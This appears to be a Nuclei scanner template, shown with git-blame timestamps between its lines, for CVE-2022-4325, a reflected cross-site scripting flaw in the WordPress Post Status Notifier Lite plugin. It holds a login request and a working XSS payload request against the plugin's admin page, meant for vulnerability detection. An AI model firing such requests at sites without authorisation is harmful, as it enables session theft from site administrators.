2023-03-18 22:07:09 +00:00
id : CVE-2022-4325
info :
2023-03-28 20:37:51 +00:00
name : WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting
2023-03-18 22:07:09 +00:00
author : r3Y3r53
severity : medium
description : |
2023-03-28 20:37:51 +00:00
WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.
2023-03-18 22:07:09 +00:00
reference :
- https://wpscan.com/vulnerability/5b983c48-6b05-47cf-85cb-28bbeec17395
- https://wordpress.org/plugins/post-status-notifier-lite/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4325
2023-04-12 10:55:48 +00:00
remediation : Fixed in version 1.10.1.
2023-03-18 22:07:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-4325
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:*:*:*
epss-score : 0.00071
2023-03-18 22:07:09 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-06-04 08:13:42 +00:00
verified : true
2023-03-20 07:05:15 +00:00
tags : wp,wordpress,wpscan,authenticated,cve,cve2022,xss,wp-plugin,post-status-notifier-lite
2023-03-18 22:07:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-18 22:07:09 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers :
- type : dsl
dsl :
- 'status_code_2 == 200'
2023-06-19 21:10:30 +00:00
- 'contains(header_2, "text/html")'
2023-03-18 22:07:09 +00:00
- 'contains(body_2, "<script>alert(`document.domain`)</script>")'
- 'contains(body_2, "Post Status Notifier Lite")'
condition : and
2023-03-28 20:37:51 +00:00
# Enhanced by md on 2023/03/28